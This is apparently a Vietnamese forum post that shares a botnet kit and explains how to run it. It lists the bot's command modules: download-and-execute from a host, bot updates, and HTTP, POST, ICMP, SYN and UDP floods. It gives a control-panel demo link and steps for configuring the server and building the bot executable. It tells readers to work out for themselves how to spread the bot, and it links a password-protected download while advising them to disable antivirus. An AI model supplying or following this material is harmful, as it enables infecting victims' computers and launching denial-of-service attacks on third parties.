Skip to main content

Share + Hướng Dẫn Sử Dụng code Botnet Của Nik3

Modules attack:
.download http://host.com/exe.exe; Download -> Execute file
.update http://host.com/exe.exe; Update bots
.httpflood http://host.com/script.php|10; Start HTTP flood
.oldhttpflood http://host.com/script.php|10; Start HTTP/HTTPS flood
.posthttpflood http://host.com/s.php?l=1|10; Start POST flood
.icmpflood http://host.com/script.php|10; Start ICMP flood
.synflood 127.0.0.1:80|10; Start SYN flood
.udpflood 127.0.0.1:80|10; Start UDP flood
.stop 0; Stop

Demo: http://goldbank.vn/xx/index.php

Hướng dẫn đôi chút về sử dụng code botnet này.

Bước 1: các bạn down code về trong foder xx các bạn edit config sao cho trùng vs host của mình rồi import file votam.sql vào phpMyAdmin

Bước 2: Các bạn bấm vào foder Tạo Bot rồi bấm vào file active.exe sau đó bấm vào file votam.exe như hình này:


Bước 3: Sau khi Build xong thì các bạn copy file bin.exe đó chính là file bot. Còn lại các bạn tự tìm hiểu cách phát tán bot nhé.

P/S: http://goldbank.vn/xx/index.php đường dẫn này là index 404 nên bấm nút tab để login nhé!

Download: (Lưu ý: Tắt các anti virus có thể. - Vì sao à? Bot nó là virus chứ là cái gì nữa, ai không tin tưởng thì khỏi phải dùng).

http://www.mediafire.com/?pg50py8oz0ng9qm
Pass Unrar: votam

Lưu ý: Code này nhập victim botnet đến 5-10p sau sẽ có tác dụng nhé đừng nóng lòng.

Share